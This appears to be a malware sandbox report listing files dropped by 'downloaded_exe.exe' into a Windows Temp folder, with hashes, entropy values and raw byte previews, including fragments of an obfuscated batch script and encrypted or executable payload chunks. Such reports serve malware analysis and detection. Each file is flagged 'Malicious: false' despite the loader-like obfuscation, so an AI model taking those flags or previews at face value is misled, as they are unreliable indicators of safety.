Entropy (8bit):	7.99762270747538
Encrypted:	true
SSDEEP:	768:bsNB4fop0yGEn84PbUEKA0PSfLmBSPsDFEo6KcS2w8KwEeDKWAwwm5EqcFv8TlCz:gT3vGE8wJfLmvFEoGbDihmyvJvRsyx
MD5:	84C683958D97DE80882BD616CBB6309B
SHA1:	C7432D946D6FB1A1A3F5A41F04F9A051179FA3A3
SHA-256:	7D706456C6E0886260C0A4383EAF2D548E0AD8CF41886EAA04B1FFA4151915F7
SHA-512:	3BC370892FFD99D771901157D3E2F91EFEF7D6F33B24B1D3F373D9F2302FF2457A666F5D57414A0BA22D6553F400B61C9958BACE7C2CE841D59E1B6AA57B5F07
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	....3..^.m?V.S. .+.b;.....<.?..../iqU..g%,...=..OE..].52.4.p.f...M..?dH.Z. U\|.P....'..pGQw.."..LC&).>.,_..L1F.=TJK..T.9.e.=.0.1]n..q.z..y......9.R.,`...gOa^...6t$.~.h.z..o..1..;Ak....HZ....C..........=..U.l.%.......vT...m..qP.W...............Wb..B....>..AS..:P&...XV..eX_c..u`.I]..E'.2.X.k.O..n.<.k.j....,Jp-......;.x$......Qs...7....-~,.... .Q.v..3gL.K./.I...g.&c.....O$..US...L..E..54.j..Lq.N.WI+.:%.......b.9..3.....H...>..Fn.=^r.(..E#..2cQ..O.:7=..[..^..^.e.......F.~.=~?l.....b.1..~Q..[..V.....SKeE...W..1r..........4..W..=n?.~../.....v.2v.bf.....5..Z.$..4.d..rE.[_..4.H..............x#c..\v.b..HuN.}.....j.t....c.V 2p........"..J>....d.S........."i2..M.S.....,xE..aBN3..........F.w...Z.E...I...D.....q!#.y0.Z).O.6_f...NJ...+....%.8@t>..\|W...=(..eZ.+...b..b...u^..,[.1.....!..a..i.4,7..z...x..#V.u.852.2......sf..KxoJ._s...)xNS.<.@c.xe.{.x.:...l.'N\.e.`.......&CjB+..u....yL...<8m..i......A.0%...W..i..8h.Z......Tnp.........$..Si..l%.........n

C:\Users\user\AppData\Local\Temp\Estimates

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	ASCII text, with very long lines (642), with CRLF line terminators
Category:	dropped
Size (bytes):	19018
Entropy (8bit):	5.115005060959808
Encrypted:	false
SSDEEP:	384:SAedBvx1YnE0+Ejr8ByOpu/ZmCWZAiSPMLYtGkfejeoFHFH9C4bPT0AcP:SpbbyYZpGZmCcfmeqop9jLcP
MD5:	AAA4FDCDEB83B512374BE372D2FB2517
SHA1:	0FFDD59D6F11920F797C9077B892F9464843D08E
SHA-256:	2F2E0C7E7F43387F8CB12839A26284AB7C2C24B7A19C5BCEBA55A1F376796003
SHA-512:	DF3B913AAE1A153A6B399DA19E5A9B5CE1C878D2DD60A2EDF08F7320B96F8507B10333616BCB3EBB01E14ECD69D2EC8DF3FDB958C57B4CEBCAC40D084CA6B548
Malicious:	false
Preview:	Set Saints=w..WUJChaos-..HvWsMaps-Streaming-Spots-Buttons-..dvbwFeelings-Msg-Ff-Appointment-Va-..KEPartner-Saves-Windows-Tourist-Telecharger-Qualify-Milton-Uncle-Olympus-..oUOsPhentermine-Jp-Democracy-Diary-..MhwmNickel-Except-Fc-Apartments-Conventions-Soundtrack-Vacation-Str-Wood-..DDXXDeny-Gcc-Shepherd-Partnership-..FCjWInteractive-Tropical-Infrared-Target-..Set Hampton=r..eRrEquilibrium-Payroll-Gangbang-..kghoCreates-Virtual-Volvo-Translator-Dial-Cloudy-..SAanVisitors-Replication-Buildings-Temperature-..KzlaRwanda-Nintendo-..JHAppeal-Copyrighted-Shall-Proved-Launch-Very-Borough-..Set Industries=5..AbNEmails-Genetics-Crime-Standing-Programs-Invitation-Optical-Presented-..XXKqCloudy-Decimal-Understanding-Political-Tire-Conf-Comment-Availability-..jmDawn-Fluid-..eAhDeferred-..RkPRhythm-Hide-Consequence-..qGaSigned-Kodak-Audit-Nottingham-Socket-Mart-..Set Ieee=9..bFButtons-With-Mods-..mByDimensional-..ETRunning-Shape-..fgLCanon-..OdRealtor-Vacuum-Intro-Showing-Prostate-..LxqTWeekend-..p

C:\Users\user\AppData\Local\Temp\Estimates.cmd

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (642), with CRLF line terminators
Category:	dropped
Size (bytes):	19018
Entropy (8bit):	5.115005060959808
Encrypted:	false
SSDEEP:	384:SAedBvx1YnE0+Ejr8ByOpu/ZmCWZAiSPMLYtGkfejeoFHFH9C4bPT0AcP:SpbbyYZpGZmCcfmeqop9jLcP
MD5:	AAA4FDCDEB83B512374BE372D2FB2517
SHA1:	0FFDD59D6F11920F797C9077B892F9464843D08E
SHA-256:	2F2E0C7E7F43387F8CB12839A26284AB7C2C24B7A19C5BCEBA55A1F376796003
SHA-512:	DF3B913AAE1A153A6B399DA19E5A9B5CE1C878D2DD60A2EDF08F7320B96F8507B10333616BCB3EBB01E14ECD69D2EC8DF3FDB958C57B4CEBCAC40D084CA6B548
Malicious:	false
Preview:	Set Saints=w..WUJChaos-..HvWsMaps-Streaming-Spots-Buttons-..dvbwFeelings-Msg-Ff-Appointment-Va-..KEPartner-Saves-Windows-Tourist-Telecharger-Qualify-Milton-Uncle-Olympus-..oUOsPhentermine-Jp-Democracy-Diary-..MhwmNickel-Except-Fc-Apartments-Conventions-Soundtrack-Vacation-Str-Wood-..DDXXDeny-Gcc-Shepherd-Partnership-..FCjWInteractive-Tropical-Infrared-Target-..Set Hampton=r..eRrEquilibrium-Payroll-Gangbang-..kghoCreates-Virtual-Volvo-Translator-Dial-Cloudy-..SAanVisitors-Replication-Buildings-Temperature-..KzlaRwanda-Nintendo-..JHAppeal-Copyrighted-Shall-Proved-Launch-Very-Borough-..Set Industries=5..AbNEmails-Genetics-Crime-Standing-Programs-Invitation-Optical-Presented-..XXKqCloudy-Decimal-Understanding-Political-Tire-Conf-Comment-Availability-..jmDawn-Fluid-..eAhDeferred-..RkPRhythm-Hide-Consequence-..qGaSigned-Kodak-Audit-Nottingham-Socket-Mart-..Set Ieee=9..bFButtons-With-Mods-..mByDimensional-..ETRunning-Shape-..fgLCanon-..OdRealtor-Vacuum-Intro-Showing-Prostate-..LxqTWeekend-..p

C:\Users\user\AppData\Local\Temp\Ferry

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	7.996730875047278
Encrypted:	true
SSDEEP:	1536:LGHIW7BDPdeDRrtZK1snSDx24tBoixg+4Dhr:LeIATQRrtM1Lx24tBFr8hr
MD5:	959CE45C8C2A59C634F90C5FAE75D6EC
SHA1:	2CA773C8A0FF1D90EA47F35AFB84710577FF9E56
SHA-256:	3DD732FF576BD9A5B79D56DC6083DB3034997A0A28F3B9D46DBF66485A30F310
SHA-512:	ED14AFF4DC07627308BED52E696E0D6DFD1643D358472F40F39F628A190BC8EEFC2BCEF056CA582B0B7FFFCF86B2BE5FF53E29DB637C2DD3A98823D701D22330
Malicious:	false
Preview:	.w......g2.&....N%.IqtP/...G.!k...U7e.t....i.l.......O2....l...{u.+.x..n...TAKEv...)..jY..a....%7....B..r.........&....9.zm...1.J....FQO;....W...y......Pl.&.4.v.....Syv..f{...:..[.R.U[c...m.?so..q....:..h......Q. .k...g..3../P......N?.....n........oo.O....,..B.9....'.&.r...0.I......!..z8,..............dZfQ`ot..ia9.].\|.".1..P.fr...9......!e..................+3..nN..G^9.".:a..'.`~...J.(T;...P].'.3.....6..4~......N~....T.)......7.K..}....k..#..1d...U..dh..`.K.m#.2.ND.s..T2.M....0.$...mgi.#........`..j......#...t..#.d.`.).K .i....(.t........l....c]...z;....S.DB..-.s.#..,B~.Z..g.S..{.){-.....>...}_....S...l...C....Q2De]d....%Cgb.>.. .e@....<.F..D.D.'D....p#..#.....Y:5DV._]...!.h..B!....L.RKf......J....^...97.,;(...........6...b.vC..X.3....D........"._.Qo.v.LY..,.+...".5..YPa..dd.7...Kw.W.....G-..ew...<..;'.........g/..K....#Tc=......O.H.?.`...T........g#...!d&.62>.3..1./.3...zJ7g....RR...sZ.?H.1_...s..t."+.J.....C.......C..F@

C:\Users\user\AppData\Local\Temp\Fleece

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.372255258923795
Encrypted:	false
SSDEEP:	48:09n9mTsCNvEQH5O5U1nPKrhBzM1FoMPhfq1koCqxLVJcd2u+ME:4SEA5O5W+MfH5S1CqlVJcI6E
MD5:	11E32C4B52B5C5D27CA84472C507E38F
SHA1:	027AC1042D436C566DE20450C8ACDE9DF87D3CDA
SHA-256:	97E62159D0EFE8E02632B13EBE50A3E084CE2599369AC36CB8B055B11E388634
SHA-512:	62C4065166CBD8D4BB0C0950E98A9420C07644DBAEA24C5043EF4F8D82E7F5D323C8BA217DE5FB26E0D0BC1DC454E88F67D17FAE33EFF9AD05682F8908F01E82
Malicious:	false
Preview:	exports........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B.........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Fo

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	152576
Entropy (8bit):	5.648410854278383
Encrypted:	false
SSDEEP:	1536:PKaj6iTcPAsAhxjgarB/5el3EYrDWyu0uZo2+9BGmdATGODv7xvTpS:H6whxjgarB/5elDWy4ZNoGmROL7F1S
MD5:	597A4DEAAC6F2DFD9BA9D6557943D9F3
SHA1:	28AC694327FA3DD08430100FB09C2E979BD4674B
SHA-256:	5A4EF5678A121AB130FC48E03346B0519CFE6FC5EEEA1B84C769E6674814B580
SHA-512:	EAA12ADC55088DBF330DF6CA887E2E54CC58F8208479F20C125969080F36A8206B0EE1C0E97822D664DB52E7D0E1B2AB67843365962C647197BA1258CE376239
Malicious:	false
Preview:	................................................................................................................................................................................................................r.r.r.r.r...........................r.r.r...................r.r.r.r.r.r.r.....................r.r.................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.............................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.r.r...............................................................................r.r.............................................................................................................................m.m.m...........................

C:\Users\user\AppData\Local\Temp\Francisco

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	6.686268342928445
Encrypted:	false
SSDEEP:	1536:wEq30BcrTrhCX4aVmoJiKwtk2ukC5HRu+OoQjz7nts/M26N7oKzYkP:LnEoXnmowS2u5hVOoQ7t8T6pUkP
MD5:	5A659985D4C0913F85D5FE9813C7888F
SHA1:	90B63406571EFD5BA6177C2645B3D934E6E68F37
SHA-256:	A8FEF5473B89161725C6DC93C44CE9D939245EAA122BF85DAA2629137B2E0B1D
SHA-512:	348B9355A58D4F1E95E0DB919331EEDBD77D00D8A15FE519C4634F8740B1BF58E003A9429F88B90B3EDB3704B714AD2BB2C61D69A688D8233F3555D4D9A1FC00
Malicious:	false
Preview:	..H.I..E...u.......E..p.3.j.Z...........Q.7...Y..WVj..u...H.I..M.3.f..O....3.F.,8S.u.W.b...YPW....I..s$W....YY..t.......3.W....Y....W....Y3.@_^[....V...6..l..j.V.}...YY..^...U..W...O...0.I...t.V.q8Q.......u.^.E..t.j.W.C...YY.._]...U.....U.SV..3.u.W...~....N(.N0.N4f.N<.N.....'....]..........E.........9M.................F.................N.........F.................^..E..N..................z..u.....3..@.Wh4.J.P............j..{...Yj....nL..p..@......F(.`...Yj...HnL..p..F0.L...Yj..`.....mL..p..F,.4.....$TmL.hlmL....mL..p..F4..P...Q.........U.E.M.........E.........U.Rj.P...QD...v(P...Q....F8P.v4..Q.RL...U.Rh..J.P......x..E..v4j...j.P.Q..E.P...Q.j..7..T.I....F.P.....p.j..v(j.j.Q.R,j.^..P...Q8..N..t...u..u.y........j.j.j.S.V...U.Rht.J.P........y........j.j.j.W.0.E..~.WP...Q..M...Q...R...x..M.........@..3.QQQP.0$M......_..^[....U..Vj.......j....mL..@......p........j...,nL..p..F....j....mL..p..F.....M.....p....mL..H..f...F...N..F..^]...V..W3.9~.t.j..v..P...YY.~.9~.t.j..v..<

C:\Users\user\AppData\Local\Temp\Invalid

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	70656
Entropy (8bit):	7.997057910589192
Encrypted:	true
SSDEEP:	1536:emxHpvNdCb9MXzIopR1WGnQXGN2vVISY1iLFnNHa7jbrbf:emxHpvNd++XzJNWJWN2vVIeHa7jvb
MD5:	B624EC4EC48AD6EEC4909E7C596A8FFC
SHA1:	0BD162E49D9F63F74166FDAFD0D63428ECCF238A
SHA-256:	8744305A517C819C790092C5981027BC0DD24B6D0206289C9C95F21CD258AA64
SHA-512:	094E442C664934B785F3DC73A2197EBBB24CBC7D0F7D6C6ADEAECE46DA46B86DA027066CE7091E7D7CC1E5C83CF04400AB6880C2931A9F190937C22B873806D2
Malicious:	false
Preview:	.?.z..t.....V..m...........U.....L2..C#\|,pD.f;...{........}.3eD.E..;..L...P......j5...q...tz.#.tA..d...4. .b>.\.\|J...6...Y.`\.U...{.j...O...z.MN..=.8s.....v....3.............a'p.O..b.Y..2..M[z..{..q.;.$yh..... .c...2...c.y...f.....ymv...g.}R..u.....I.,..y".In..t....`...a1.gx.Z.01&@..L<!...$........x..b..s....M..su.I..C.1..?ua"....q.zk..0\|..!...y..9....2.f..^....x....?."u/...Jy.[.J.s..'..5.=...J.}w_(U.V.E....................7.........@...y...c.Tw.1jw.........'.l...MJ...y..h..._...5q........kA.t>....+p.....WT...S_o.5....8.....R+.....9T%bu...A.....Y......L.1.9..c.!..2)..?..f-Qn.......g.H.p.=.ce..J\|.!c.{..c.......BNd..Y..8xU.."..,.m.U.{Ii...p<;.H..-..eoq}c.,.X&v.OZV........#..JU..2..<..n:......... _.S.D....6...}.&"......J.-.g.{.....mw.F./;..".O.."....9..M.."...Z.c.B..@...w..&..8.;..!2(H.....%..z...CO.j..j..fF.......%..&.P.....'....u.g?.[.....Wp."Nw....n.\V..A.3."E..U.k....0.dmO.......2.{Fs...f...4l.+......Z.*..a.+......1s@.

C:\Users\user\AppData\Local\Temp\Investigated

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	125952
Entropy (8bit):	6.637958619688465
Encrypted:	false
SSDEEP:	3072:lPtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnjq:DCOMVIPPL/sZ7HS3zcNPjq
MD5:	78C8BA888589BD9AFDBB5217CB31B8B9
SHA1:	CB188EE03EB14AA2FFBCC107CD41876575D9A3BB
SHA-256:	E52A6FE2900DE3C8F9420DFE7F5180C86AE751BFAD106AD88A2B9E0A2BBE1F94
SHA-512:	1B874C9F16360BC510C97A5847409BF09209ADAF9505692E90AA20F4F6FA5262AEAF8AD574ACEE32C73E0F27F61B035C5F09C4B8D4865D33D612F14037298F42
Malicious:	false
Preview:	L$`.D$..~\|...L$@.,S...D$(.D$,.+$...........j.Z+..........tp...t.3.f..l....$....3.W..................Q.....Y.....9.t.Q.1.I......YY..3.f..j....YW...xH..W.F.....Y_..$.....E.P.....0..l...P.....YY.M..R....$...>..,zL.u..8zL.P..l...P.....YY..#...6..l...h zL.P.P.....#..j...l...P.v..6......#......$$...j&..f;...o&....$....f..i%...%....F...%...V%....$.<....%..j9X....%...E.........L$..........@$.......4$..j1[.,$....t...+....0...f;.u.......u.3......%...E.M....%.......@..j....P...S$..Sh.....u..P4.......&.....O&...}....}...&...E.......&.........&...D.....O .D...D....&...G.;.u..H...'...G,......&....,...&...E.E.j.P...G,.....".......&....+...&......'...A.j..........E..E.........u..F....F....3.E..............Q.......)........c)..S.E...P...;.t.P....Q...M..yP.../'......&..Hj..................C..C.@..u..............3.C...............Q...........C...E....P.3V.............=.A..s........E..E...y.....L.=....s#...CL..}...E.......E..m..}.E..m..K=....s#...CL..}...E.......E..m..}.E..m

C:\Users\user\AppData\Local\Temp\Membrane

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	151552
Entropy (8bit):	5.91839466876771
Encrypted:	false
SSDEEP:	3072:roRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPF:M0JaAOz04phdyt
MD5:	22A5D9AC1ACAC37CB7E34165534E21E6
SHA1:	C4B8D3D7C31BC65E079B15D443C140DEBE6B3F08
SHA-256:	6CC53B11DA34B76750E48984CF489C803CA49F7C6FCEFD59D49AD0B99886279E
SHA-512:	1C022B84FEF269313316E8F632B935F6D348ABDCB940F5ACC9ADC8A7CF6FA7F615DAAA32F72729B132783A4B30637FBBECED744821EDD3BBD672FB414E604E78
Malicious:	false
Preview:	.u..b......8..t......uX.......]...~.;.t........RQ.7VP./..........]..T)M..M.......xP.t.j.j.h.....pP..H.I.............u.......u!......P......Ph.....7..H.I..M..U.......~.;E.u........RQ.7VP....y....].S.6..t.I......d....u..u..7VS.....j..7..\.I......t.j.j.h.....6..H.I..U.M........SV......M..U......2._^[.......I.".I...I...I.*.I.1.I..I.W.I..............................U...L)M..@)M.SV.u.........W.8..t.j...(M..C.....h.u..Gh..._..^[]...U..SVjDj..8@M.S....j.j..\|@M.V..........8@M.D...3.@.d@M.VSf.h@M.3.PPj PPP.u.P....I.^[..t..5\|@M...`.I.]...U..S.].VW.}.j.^.W..U.9.............95d)M.\|~.T)M........tg9Q.ub.........tT.........;.....t........t:...t5...t0j..1.. .I..T)M............@t........u.j..0..T.I..U.C;.d)M.~..].......95d)M........T)M........tj9Q.ue.......t\.......;.....uM...... uDj..1.. .I..T)M.j.......0.. .I..T)M............@t........u.j..0..T.I..U.F;5d)M...x...j.Sh............H.I._^[]...U..QQ.e...M.SVW..;...]...S.E........}.Y...vph..L.S........Y..CP.....YY....h..L.S.E........Y..CQ...

C:\Users\user\AppData\Local\Temp\Namely

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	63488
Entropy (8bit):	7.997227857678396
Encrypted:	true
SSDEEP:	1536:Dgeu8c5+shO+lhUWggm6bSVUpnbP31aBMU0yMG5pPhTUDA3Kf:ceEVO+Zggm4GGwNBMG59Kiw
MD5:	FBD4C6BB9391FB26D20506FD6DC01FFF
SHA1:	F7B98777865A2372EC8F09D8675EE676C7C3318A
SHA-256:	1EC64A1390358734BB02501BF8675885F3CE7CEE3C25AB49678AA6235DE7C13E
SHA-512:	F19A9B6002A24F6EB73492DC1C4DCC995C4B7F59DDACB51A93290671AED2125D8ECE600FB2BD5734216E4F11DDA74437C5E2130B6FE99A5A97AD4A7A29DBAFC1
Malicious:	false
Preview:	.~2.i]J...?..%F.V..../..k.3..t...x5u..s..n.[c.../n..k.....o....W.[......6..z.UP...A....0>......)..):..$.x.6...h[~]....'q^..B......5...ST.Y...<...h.}.Or.7.....4..tQn..e.[..L....O....rF.N'....6....;.0d.Z.8.f+.1Xc....e.h...f..jpr.9....PzGw.`.[.'...%nJ...v8.......W"..].R....P.....$.....VB....<%J".u)....>.b...a.wu..Q^Q.`u....lt.j..B.l..x.~..y....`.W..X...Z.<..^]......Utz..0...p.,$s!I.AG..}z.. p.E......1....V......;.`..&.....6..-.'-k......Y.].U;...!..[-..K.+L=..L..O..Qy4.,...C........k}.`..HZ%.!=.!......K....~q.G.jj....G.L.ol.....$..........OW..Lh...U..c...ghe,..z....UU....?>J....Uv..v;..{.T}p../.?@.,.z..._.'`G.........L..u.VlL...,.....9.q?..iQsj..M.wP..W.)...P.l.W.5..._{Ix........ij...g.2[...g...&..[6...q6...w".d..z.k..j)........g...#m...gD....~.!I..........!...Xo1a[.Bb.Bi.wR.....\|..=~...../.C{w..........~...Y.c....3."H3,.s....b.Z.....[.....:.t...p6..!6=6.J..h.1@..i5..........QI.3.s.s.X+ q....B...^....piY:7.S..}.../A..$Z.<......#...

C:\Users\user\AppData\Local\Temp\Premier

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	94076
Entropy (8bit):	7.997971053760013
Encrypted:	true
SSDEEP:	1536:3nW5R64T7dn8NF0pOfZY8qfSnGtpLeVQRzFzULbWwvoR4vu+OVgPryacbBSDeX9n:XsZ7dn8vZlGzLeV4xzULqwpu++UcbBSQ
MD5:	09654DD2D75795DA9BEF73F6D7C477A0
SHA1:	7A78720C567FB49E810E361EE743418BE00A4D1A
SHA-256:	637A0BDEF2D50E640EE34BEC0ADB6EBF4B6AF779AE9742444490553AA16E16AB
SHA-512:	90E7DFFC5B265286BA3F393D51984311AE727CCDB353BBE7C052630680D9E431C2D9DFC158DE12E1AF34FB91723DC0B3597F08148956152369C9237701C0F5D8
Malicious:	false
Preview:	...Y.Hr.j./.s^0..uCh...BY.f$..0....3.....==...%U.........).C..u.U...:.S&..f..w].d...C.w.Q....o.......;..d[...Y:....s....g.{5a)1>...m...y.$Q....!.b............/....!..m....?w..L..b.}.o..k.g[....M.<#.N.'0J...V#hx..j....s$T/...f..^kZ7.....cG..O69v..@E...pzT.jj...>.W.KL\.........%.'.\|Q...I..BJ\B...N.n.@'..s.c-.2jeW.........I..S.#a...P+j..x".Kn...3..~..../K.,.Oh.1F.Lg.x5uN....>e,O.....&...C..7....4 o:_Dw...Yw.^..X.W!.;..\|I...8U...A$2Ce..O..F.c.dY3.l0..<N.[sM[F....o....Z.l.T.V.1dFab_.....u}&.K.T0...K..\|?.'..#..s....`Cg.p.r...2.p.k.i.C.0.omt.. ^/_'..[...._.e.X..Kv........9.,.tCJ.7.........e....L/..N;8.u....[....d..4....D.W.@..B.i.i{..}...X.....n7....[.?.dY>n;.{....>.........g.i.........,...3.b.y.d..jZ.3-y.oM....{%!.!=.... .j<.QF.~...Y.`.g.?............%...#X6.../<cQTY..o.a...t.{kH.....x6.'B.>.H...5.c.\...y...+F..9e>...rC..R.oQ `w..K,...{..8........j._`.@....D\|..E.1<..O...........I...?u......3 Y7<.(.2.7....K}X .E@?w.T.<l...

C:\Users\user\AppData\Local\Temp\Reminder

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	142336
Entropy (8bit):	6.709299852395781
Encrypted:	false
SSDEEP:	3072:uccBiqXvpgF4qv+32eOyKODOSpQSAU4CE0Imbi8Q:uccB3gBmmLsiS+SAhClbfQ
MD5:	1BF35427A4FB34B46E0EFB391EEE2FB0
SHA1:	8727F3434118B183E33DEB137A5CB2C12A51AB40
SHA-256:	AC647FF0823D3781D6A6492D55DA0C8FA715DCD6EE6739C96AFDC2BC49D27B9B
SHA-512:	8C5C73D1FCE516BA92B23F8C676DA77D80FA8777C75DE44BB6A5C356D7BA31BB86CE63C7067AB03DBDCD2A59B4AFB6CA21CC82AD63D29521F379FA91DA21D7B5
Malicious:	false
Preview:	`.L......U..M..:.}......y..z..e...u.VRQ.].S..........t!...u4j..F.P.s......YYP.v.W.1......F.P.s......YYP.v.W......E......M.d......Y_^[..3.@.e..L....U..} .S.].VW.}.t..u SW.u..H.......E,..u....u.P......u$.6.u..u.W......F.@P.u.W....h.....u(.s..u..u.W.u.......8..t.WP.{..._^[].U...TSVW.}.3.W.u..]..u..]..........E......Y...;G...P....u..>csm........~.........~. ...t..~.!...t..~.".........9^........:...9X........,....p..$....E...@..E.........>csm.u*.~..u$.~. ...t..~.!...t..~."...u.9^............9X.tf......@..E.......u.V.X......YY..uD.}.9...y.....].G.h(.M..L...=............M.C....M.;.\|..H....U..U....U.E..M..}..M..>csm........~.........~. ...t..~.!...t..~.".....j...9_........u P.E.P.E.P......U.....E..E.U.;U........M.k...E.E...@..E.E.9.......;H........x..@..}..}..E.].........F..@.......U.E...M.E...~+.v..1.u..s........u,.E..M.H....E..M....U.E.E..@.E.;E.t0.E...u.E..u$.E...u .u..0.u.W.u..u..u.V.......,.U.M..E..B.U.;U...&...8].t.j.V....YY8].ue..%....=!...rW9_.u..G .....tH

C:\Users\user\AppData\Local\Temp\Stewart

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	88064
Entropy (8bit):	7.997999838769318
Encrypted:	true
SSDEEP:	1536:p2rNsGENka6dHSjxL63/ndJBTV2EM2zqqA3bb/ByP5qOv6GueCWqtea:QnEN/6dyjxLsJBR2EXGb5yP5CeCWg
MD5:	9AD816E284CAA0CEA7D662C974651CD7
SHA1:	BDBAE7579D91333AAE508E17DB924D11C27C83B3
SHA-256:	46B15D3873E7335DF9DAD62A07BCE430E2B8D8EF3F519FF5C91EC951C8058CBA
SHA-512:	8684A48FD1D7DEE1138A67F76ECED2616C81EDA293C0725D8D2DC552FCA289026F834E77509C9715953909019D45AD13CEBEA8E822F397BE9E5D1B53045E73B3
Malicious:	false
Preview:	....l.@......>...<...x<..Y,.!@...y].W..Y..B\.\|...F5.[.....f......KfL...9.#J..?%.`=...8...j...l.]0..hEk.<bM..@.q...;...IQ[_o..jme..S..~\|...q...)..7.~\...J...F.H..L...hqg.<5[rd5...q....G...p. ..FZ).Rp9........%er.\|.vJ$@.......;X9.......p......(...lf.L....c3..I~.....h...&.f.....:..0.$....A....O.l..u...........SQ{.QP.l.o.....K...........,1....c;K...`....#..8.YV...c.NE.@...x]...0....w.l-.0........O1..vw.e.H....h........2+.......1?.q....;.6.@y..x.7...CL..-~..P.7..%.N.'........5>..8=..$...iKhVV.AW.R...9.H..c..Q7o~.....T#.m..,1.q...... t[GH8......H\|.P.............wt..........\|.E&....+8.8"..rF.I.r.S.).8.....W.C..E.K<C.......?"2...?1..t.`.I..f./J.t\6.+B.-.3..N<....g^...\|r./..iY........n$G.,#\|Rz.{+.E...Z]$5.A$....F..W[..:c..Y.....=.L...A..\.",Q.\...#.M.....-.]..H.......W@.^G...in...j...V>.@..RL.L.O......K...i.-....T............K.Y.vYM5..L..E.H^.r....?.v..n(.?..M.bc.x.....p..U.u.T ...H9.d..Q..H.....i09{?.....9.J.Y,.\|c>?.c..T..#Y3.h[#.F.,&..g.

C:\Users\user\AppData\Local\Temp\Transport

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	146432
Entropy (8bit):	6.566033976296429
Encrypted:	false
SSDEEP:	3072:ZJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioO5bLezW9FfTut/Dde6u6Z:Z0CThp6vmVnjphfhnvO5bLezWWt/Dd3D
MD5:	2A326DB2D16EC850B130BA3B89A00905
SHA1:	2B9270D781D7ABF1A2C83521F1800AD40D9067B3
SHA-256:	0520EFD0E879F8A9A34D05F1E06D7252865DB2EF26EE98BEA6779D5608180D89
SHA-512:	D788E90D22C6B150766919ED14333C59E681371DDAA8B32DDB7B9C6B170C5BA616A7B77B40F5198D5D6467639A952694429E031DDC15F7AB0A306CAA07DC9408
Malicious:	false
Preview:	..@8.X.V....I..L$H.ko.._^..[..]...U..QS.].VW.E...{..r..C..H..6{....t..E...C..p....T@...F..8.C..0...C@...F....u......Y..u..u.........&..F....._^3.[....U..SV.u.2.~..r..F..H...z....t...F..0....?...N........u..u.......&..F.....^3.[]...U...........d$..SVW..M.h..I..\$.......E..@..0...?...N....D$..A..D$..A..D$..A..L$..D$ ...es...t$..t$.....I..D$...{L.W.D$..N...Y.L$.j.^;.u?..t!.D$.+.........\$.f;.\$.u......u.3...u.jc....f;T$......@..D$...{L.W.D$......Y.L$.;.u?..t!.D$.+.........\$.f;.\$.u......u.3...u.j..,...f;T$......@..D$...{L.W.D$.....Y.L$.;.u/..t!.D$.+.........\$.f;.\$.u_.....u.3..........D$...{L.W.D$..J...Y.L$.;.uL..t!.D$.+.........\$.f;.\$.u!.....u.3...u!j.....f;T$......@.f;T$......@..D$...{L.W.D$......Y.L$.;.u<..t!.D$.+.........\$.f;.\$.u......u.3...u.j..!f;T$......@...{L..L$........t.j.^....\|L..L$..............3.ja_.\$HW.L$....h.\|L..L$.......t$.....I.;.t...cu&...t!h0.I..L$..2....t$.S.?....D$,...YYG..z~..\|$$.\$..........M..7,...O.3.QF..VS.2...d$<..D$4j.VPS.\|$D.

C:\Users\user\AppData\Local\Temp\Understanding

Download File

Process:	C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
File Type:	data
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	7.99774834665167
Encrypted:	true
SSDEEP:	1536:kpK0VXPIswlaOXklN8yD0CQBxgwrBDCldent3yAEdxpSP388tlhi2nDMw:kbPDdO4eyG1er4iAYxpSPs/sAw
MD5:	464C28CB0D0D1A38EAD3DD487C08B782
SHA1:	8C8F2FE5C34B05E2D353899F3365C3CBD6E7843F
SHA-256:	8779E76010D132C18BCD4BDF9BB14000F738132E2677F71A7DD561AADE6165D4
